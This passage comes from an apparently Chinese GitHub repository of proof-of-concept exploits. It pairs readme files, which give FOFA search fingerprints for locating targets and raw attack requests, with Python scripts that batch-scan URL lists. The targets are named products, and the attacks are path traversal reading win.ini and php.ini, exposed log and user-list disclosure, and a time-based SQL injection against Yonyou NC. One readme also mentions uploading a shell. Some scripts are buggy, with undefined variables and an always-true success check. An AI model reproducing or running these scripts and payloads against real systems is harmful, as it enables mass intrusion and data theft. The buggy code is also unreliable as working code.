敏感信息泄露漏洞 ") 61 | else: 62 | print(f"[-] {target} 未发现 敏感信息泄露") 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='canal admin weak Password') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240102某神SecGate3600 authManageSet.cgi信息泄露漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 某神SecGate3600 authManageSet.cgi信息泄露漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | ``` 8 | body="sec_gate_image/login_02.gif"fid="ldb0WVBlAgZloMw9AAge0A==" 9 | ``` 10 | 11 | POC: 12 | 13 | ``` 14 | POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: close type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc 15 | ``` 16 | 17 | 18 | 19 | 20 | 21 | 批量poc(记得安装库) 22 | 23 | python poc.py -u 24 | 25 | 26 | 27 | python poc.py -f .txt 28 | 29 | -------------------------------------------------------------------------------- /20240103FreeRDP存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a FreeRDP存在任意文件读取漏洞 poc 28 | @version: 1.0.3 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "../../../../../../../../Windows/win.ini" 39 | 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0", 43 | 44 | } 45 | 46 | 47 | try: 48 | response = requests.get(url, headers=headers, verify=False, timeout=15) 49 | # print(response.request.body) 50 | # print(response.content) 51 | randstr = r"id" 52 | if response.status_code == 200 and ("for 16-bit app support" in response.text): 53 | print(f"[+] {target} 存在 任意文件读取 ") 54 | else: 55 | print(f"[-] {target} 未发现 任意文件读取") 56 | except Exception as e: 57 | print(f"[*] {target} error: {str(e)}") 58 | 59 | 60 | def extract_host(url): 61 | """ 62 | 从 URL 中提取主机地址和端口号,返回 (host, port) 63 | """ 64 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 65 | if match: 66 | prefix, host, port = match.groups() 67 | if not port: 68 | if prefix and "https" in prefix: 69 | port = "443" 70 | else: 71 | port = "80" 72 | return host, int(port) 73 | else: 74 | return None, None 75 | 76 | 77 | def main(): 78 | banner() 79 | parser = argparse.ArgumentParser(description='canal admin weak Password') 80 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 81 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 82 | args = parser.parse_args() 83 | 84 | if args.url and not args.file: 85 | if "https://" in args.url or "http://" in args.url: 86 | url = args.url 87 | else: 88 | host, port = extract_host(args.url) 89 | url = f"http://{host}:{port}" 90 | poc(url) 91 | 92 | elif args.url is None and args.file is not None: 93 | url_list = [] 94 | with open(args.file, "r", encoding="utf-8") as f: 95 | for url in f.readlines(): 96 | url = url.strip().replace("\n", "") 97 | if "https://" in url or "http://" in url: 98 | url = url 99 | else: 100 | host, port = extract_host(url) 101 | url = f"http://{host}:{port}" 102 | url_list.append(url) 103 | 104 | pool = Pool(10) 105 | pool.map(poc, url_list) 106 | pool.close() 107 | pool.join() 108 | 109 | else: 110 | parser.print_help() 111 | 112 | 113 | if __name__ == '__main__': 114 | main() 115 | -------------------------------------------------------------------------------- /20240103FreeRDP存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # FreeRDP存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:body="css/vkb.css" 6 | 7 | POC: 8 | 9 | /../../../../../../../../Windows/win.ini 10 | 11 | 12 | 13 | 直接GET请求即可 14 | 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | 23 | python poc.py -f .txt 24 | 25 | -------------------------------------------------------------------------------- /20240104某友CRM存在任意文件读取/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 某友CRM存在任意文件读取 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "pub/help2.php?key=/../../apache/php.ini" 39 | 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0", 43 | 44 | } 45 | 46 | try: 47 | response = requests.get(url, headers=headers, verify=False, timeout=15) 48 | # print(response.request.body) 49 | # print(response.content) 50 | randstr = r"id" 51 | if response.status_code == 200 and ("for 16-bit app support" in response.text): 52 | print(f"[+] {target} 存在 任意文件读取 ") 53 | else: 54 | print(f"[-] {target} 未发现 任意文件读取") 55 | except Exception as e: 56 | print(f"[*] {target} error: {str(e)}") 57 | 58 | 59 | def extract_host(url): 60 | """ 61 | 从 URL 中提取主机地址和端口号,返回 (host, port) 62 | """ 63 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 64 | if match: 65 | prefix, host, port = match.groups() 66 | if not port: 67 | if prefix and "https" in prefix: 68 | port = "443" 69 | else: 70 | port = "80" 71 | return host, int(port) 72 | else: 73 | return None, None 74 | 75 | 76 | def main(): 77 | banner() 78 | parser = argparse.ArgumentParser(description='canal admin weak Password') 79 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 80 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 81 | args = parser.parse_args() 82 | 83 | if args.url and not args.file: 84 | if "https://" in args.url or "http://" in args.url: 85 | url = args.url 86 | else: 87 | host, port = extract_host(args.url) 88 | url = f"http://{host}:{port}" 89 | poc(url) 90 | 91 | elif args.url is None and args.file is not None: 92 | url_list = [] 93 | with open(args.file, "r", encoding="utf-8") as f: 94 | for url in f.readlines(): 95 | url = url.strip().replace("\n", "") 96 | if "https://" in url or "http://" in url: 97 | url = url 98 | else: 99 | host, port = extract_host(url) 100 | url = f"http://{host}:{port}" 101 | url_list.append(url) 102 | 103 | pool = Pool(10) 104 | pool.map(poc, url_list) 105 | pool.close() 106 | pool.join() 107 | 108 | else: 109 | parser.print_help() 110 | 111 | 112 | if __name__ == '__main__': 113 | main() 114 | -------------------------------------------------------------------------------- /20240104某友CRM存在任意文件读取/readme.md: -------------------------------------------------------------------------------- 1 | # 某友CRM存在任意文件读取 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | hunter:app.name="用友 CRM" 6 | 7 | POC: 8 | 9 | /pub/help2.php?key=/../../apache/php.ini 10 | 11 | 12 | 13 | 直接GET请求即可 14 | 15 | 16 | 17 | 批量poc(记得安装库) 18 | 19 | python poc.py -u 20 | 21 | 22 | 23 | python poc.py -f .txt 24 | 25 | -------------------------------------------------------------------------------- /20240105用友sql注入/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC 存在sql注入\ 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:"NCCloud" 6 | 7 | POC: 8 | 9 | POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1 10 | Host: 192.168.100.1:8091 11 | Pragma: no-cache 12 | Content-Type: application/x-www-form-urlencoded 13 | Origin: http://192.168.100.1:8091 14 | Accept-Encoding: gzip, deflate 15 | Accept-Language: zh-CN,zh;q=0.9 16 | Accept: */* 17 | Referer: http://192.168.100.1:8091/hrss/ResetPwd.jsp 18 | Cookie: JSESSIONID=C2CFFE1429FF812ABF357C2BDD5BDBC1.server; JSESSIONID=8FEF31DBA1E3188706B14123C6D1CE87.server 19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 20 | Content-Length: 672 21 | 22 | __type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=%3Crpc%20transaction%3D%2210%22%20method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset%20type%3D%22Custom%22%20id%3D%22dsResetPwd%22%3E%3Cf%20name%3D%22user%22%3E%3C/f%3E%3Cf%20name%3D%22ID%22%3E%3C/f%3E%3C/dataset%3E%3C/def%3E%3Cdata%3E%3Crs%20dataset%3D%22dsResetPwd%22%3E%3Cr%20id%3D%2210009%22%20state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1';WAITFOR DELAY '0:0:6'--%3C/v%3E%3Cv%3E11111111111111111111%3C/v%3E%3C/n%3E%3C/r%3E%3C/rs%3E%3C/data%3E%3Cvps%3E%3Cp%20name%3D%22__profileKeys%22%3EfindPwd%253B15b021628b8411d33569071324dc1b37%3C/p%3E%3C/vps%3E%3C/rpc%3E&1700109885028 23 | 24 | 25 | 26 | 27 | 28 | 批量poc(记得安装库) 29 | 30 | python poc.py -u 31 | 32 | 33 | 34 | python poc.py -f .txt 35 | 36 | -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/assets/image-20240107234411105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240106某友CRM存在日志信息泄露/assets/image-20240107234411105.png -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/assets/image-20240107234454131.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240106某友CRM存在日志信息泄露/assets/image-20240107234454131.png -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 用友U8-CRM 信息泄露 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "datacache/crmdebug.log" 39 | url2 = target + "datacache/solr.log" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", 43 | } 44 | 45 | try: 46 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 47 | response2 = requests.get(url=url2, headers=headers, verify=False, timeout=15) 48 | 49 | # print(response.request.body) 50 | # print(response.content) 51 | 52 | if response1.status_code == 200 or response2.status_code: 53 | print(f"[+] {target} 存在 信息泄露 ") 54 | else: 55 | print(f"[-] {target} 未发现 信息泄露") 56 | except Exception as e: 57 | print(f"[*] {target} error: {str(e)}") 58 | 59 | 60 | def extract_host(url): 61 | """ 62 | 从 URL 中提取主机地址和端口号,返回 (host, port) 63 | """ 64 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 65 | if match: 66 | prefix, host, port = match.groups() 67 | if not port: 68 | if prefix and "https" in prefix: 69 | port = "443" 70 | else: 71 | port = "80" 72 | return host, int(port) 73 | else: 74 | return None, None 75 | 76 | 77 | def main(): 78 | banner() 79 | parser = argparse.ArgumentParser(description='canal admin weak Password') 80 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 81 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 82 | args = parser.parse_args() 83 | 84 | if args.url and not args.file: 85 | if "https://" in args.url or "http://" in args.url: 86 | url = args.url 87 | else: 88 | host, port = extract_host(args.url) 89 | url = f"http://{host}:{port}" 90 | poc(url) 91 | 92 | elif args.url is None and args.file is not None: 93 | url_list = [] 94 | with open(args.file, "r", encoding="utf-8") as f: 95 | for url in f.readlines(): 96 | url = url.strip().replace("\n", "") 97 | if "https://" in url or "http://" in url: 98 | url = url 99 | else: 100 | host, port = extract_host(url) 101 | url = f"http://{host}:{port}" 102 | url_list.append(url) 103 | 104 | pool = Pool(10) 105 | pool.map(poc, url_list) 106 | pool.close() 107 | pool.join() 108 | 109 | else: 110 | parser.print_help() 111 | 112 | 113 | if __name__ == '__main__': 114 | main() 115 | -------------------------------------------------------------------------------- /20240106某友CRM存在日志信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # 某友CRM存在日志信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | hunter:app.name="用友 CRM 6 | 7 | POC: 8 | 9 | /datacache/crmdebug.log 10 | 11 | /datacache/solr.log 12 | 13 | 14 | 15 | 批量poc(记得安装库) 16 | 17 | python poc.py -u 18 | 19 | python poc.py -f .txt 20 | 21 | ![image-20240107234454131](assets/image-20240107234454131.png) 22 | -------------------------------------------------------------------------------- /20240107上海某公司防火墙信息泄露/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240107上海某公司防火墙信息泄露/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240107上海某公司防火墙信息泄露/poc1228.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 上海冰峰网络有限公司下一代防火墙 信息泄露 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target 36 | else: 37 | target = target + "/" 38 | url = target + "/log/system.log" 39 | 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", 42 | } 43 | 44 | try: 45 | response = requests.get(url=url, headers=headers, verify=False, timeout=15) 46 | 47 | # print(response.request.body) 48 | # print(response.content) 49 | 50 | if response.status_code == 200 : 51 | print(f"[+] {target} 存在 信息泄露 ") 52 | else: 53 | print(f"[-] {target} 未发现 信息泄露") 54 | except Exception as e: 55 | print(f"[*] {target} error: {str(e)}") 56 | 57 | 58 | def extract_host(url): 59 | """ 60 | 从 URL 中提取主机地址和端口号,返回 (host, port) 61 | """ 62 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 63 | if match: 64 | prefix, host, port = match.groups() 65 | if not port: 66 | if prefix and "https" in prefix: 67 | port = "443" 68 | else: 69 | port = "80" 70 | return host, int(port) 71 | else: 72 | return None, None 73 | 74 | 75 | def main(): 76 | banner() 77 | parser = argparse.ArgumentParser(description='canal admin weak Password') 78 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 79 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 80 | args = parser.parse_args() 81 | 82 | if args.url and not args.file: 83 | if "https://" in args.url or "http://" in args.url: 84 | url = args.url 85 | else: 86 | host, port = extract_host(args.url) 87 | url = f"http://{host}:{port}" 88 | poc(url) 89 | 90 | elif args.url is None and args.file is not None: 91 | url_list = [] 92 | with open(args.file, "r", encoding="utf-8") as f: 93 | for url in f.readlines(): 94 | url = url.strip().replace("\n", "") 95 | if "https://" in url or "http://" in url: 96 | url = url 97 | else: 98 | host, port = extract_host(url) 99 | url = f"http://{host}:{port}" 100 | url_list.append(url) 101 | 102 | pool = Pool(10) 103 | pool.map(poc, url_list) 104 | pool.close() 105 | pool.join() 106 | 107 | else: 108 | parser.print_help() 109 | 110 | 111 | if __name__ == '__main__': 112 | main() 113 | -------------------------------------------------------------------------------- /20240107上海某公司防火墙信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # 上海冰峰网络有限公司下一代防火墙存在信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | FOFA:app="ICEFLOW-VPN"POC: 8 | 9 | /log/system.log 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240108某r信topsec远程命令执行/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240108某r信topsec远程命令执行/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240108某r信topsec远程命令执行/readme.md: -------------------------------------------------------------------------------- 1 | # 某r信TOPSEC Cookie 远程命令执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240109金蝶云星空反序列化远程代码执行漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240109金蝶云星空反序列化远程代码执行漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240109金蝶云星空反序列化远程代码执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 金蝶云星空反序列化远程代码执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | fofa:app="金蝶云星空-管理中心" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC Cloud soapFormat.ajax接口XXE漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | ZoomEye语法:app:"Yonyou NC Cloud" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 18 | -------------------------------------------------------------------------------- /20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240111204822977.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/assets/image-20240111204822977.png -------------------------------------------------------------------------------- /20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | FOFA:app="先锋WEB燃气收费系统" 8 | 9 | 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | 利用替换文件内容上传shelll![image-20240111204822977](assets/image-20240111204822977.png) 20 | 21 | 22 | 23 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 24 | -------------------------------------------------------------------------------- /20240112用友U8 CRM系统help2 任意文件读取漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240112用友U8 CRM系统help2 任意文件读取漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240112用友U8 CRM系统help2 任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 用友U8 CRM系统help2 任意文件读取漏洞 poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | url = target + "/pub/help2.php?key=/../../apache/php.ini" 39 | 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", 42 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 43 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", 44 | "Accept-Encoding": "gzip, deflate", 45 | "DNT": "1", 46 | "Connection": "close", 47 | "Upgrade-Insecure-Requests": "1" 48 | } 49 | 50 | try: 51 | response = requests.get(url, headers=headers, files=files, verify=False, timeout=15) 52 | # print(response.request.headers) 53 | # print(response.request.body) 54 | # print(response.text) 55 | 56 | if response.status_code == 200 : 57 | print(f"[+] {target} 存在 任意文件读取漏洞") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(url2 + "\n") 60 | else: 61 | print(f"[-] {target} 不存在 任意文件读取漏洞") 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='canal admin weak Password') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 88 | args = parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in 